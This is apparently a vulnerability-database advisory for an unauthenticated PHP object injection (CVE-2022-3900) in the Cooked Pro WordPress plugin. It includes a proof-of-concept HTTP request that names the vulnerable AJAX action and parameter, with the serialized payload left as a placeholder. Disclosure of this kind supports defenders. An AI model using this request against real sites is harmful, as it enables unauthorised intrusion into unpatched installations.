WordPress Plugin Vulnerabilities

Cooked Pro < 1.7.5.7 - Unauthenticated PHP Object Injection

Description

The plugin does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object injection vulnerability.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 769
Connection: close

action=cooked_loadmore&atts%5Bcategory%5D=false&atts%5Border%5D=false&atts%5Borderby%5D=false&atts%5Bshow%5D=false&atts%5Bsearch%5D=true&atts%5Bpagination%5D=true&atts%5Bcolumns%5D=3&atts%5Blayout%5D=modern&atts%5Bauthor%5D=&atts%5Bcompact%5D=false&atts%5Bhide_browse%5D=false&atts%5Bhide_sorting%5D=false&atts%5Bexclude%5D=false&atts%5Binline_browse%5D=false&atts%5Bcuisine%5D=false&atts%5Bcooking-method%5D=false&atts%5Btag%5D=false&recipe_args=<SERIALIZED_PHP_OBJECT>&page=1&is_own_profile=

Affects Plugins

Plugin icon
cooked-pro
Fixed in 1.7.5.7

References

CVE
CVE-2022-3900

Classification

Type
OBJECT INJECTION
OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502
CVSS
7.4 (high)

Miscellaneous

Original Researcher
Marcin Motwicki
Submitter
Marcin Motwicki
Submitter twitter
NOMADziczek
Verified
Yes
WPVDB ID
c969c4bc-82d7-46a0-88ba-e056c0b27de7

Timeline

Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2023-06-12 (about 11 months ago)

Other

Published
Title
Published
2024-01-19
Title
ChatBot < 5.1.1 - Unauthenticated PHP Object Injection
Published
2023-05-15
Title
WooCommerce Product Add-ons < 6.2.0 - Shop Manager+ PHP Object Injection
Published
2017-04-27
Title
AJAX Random Posts <= 0.3.3 - Unauthenticated PHP Object Injection
Published
2024-04-03
Title
CMB2 < 2.11.0 - Authenticated (Contributor+) PHP Object Injection
Published
2017-04-27
Title
Row Seats Core < 2.68 - Unauthenticated PHP Object Injection